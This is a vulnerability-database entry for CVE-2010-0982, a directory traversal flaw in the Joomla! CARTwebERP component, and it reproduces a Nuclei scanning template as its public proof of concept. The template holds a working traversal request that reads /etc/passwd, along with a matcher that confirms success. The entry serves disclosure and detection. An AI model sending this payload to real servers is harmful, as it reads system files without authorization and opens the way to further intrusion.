CVE-2010-0982: Joomla! Component com_cartweberp - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! Component | POC: 已公开

漏洞描述

A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

PoC代码[已公开]

id: CVE-2010-0982

info:
  name: Joomla! Component com_cartweberp - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation.
  remediation: Apply all relevant security patches and product upgrades.
  reference:
    - https://www.exploit-db.com/exploits/10942
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0982
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2010-0982
    cwe-id: CWE-22
    epss-score: 0.12988
    epss-percentile: 0.9384
    cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomlamo
    product: com_cartweberp
  tags: cve2010,cve,joomla,lfi,edb,joomlamo

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402204b4f6a525ae1ac20914724393c5f895784976320ddd414d49e423354f0c53a1202200997ce0b40e6998a92a1cc2d0df40db92bca0d5eff7335663334e6094561f657:922c64590222798bb761d5b6d8e72950

相关漏洞推荐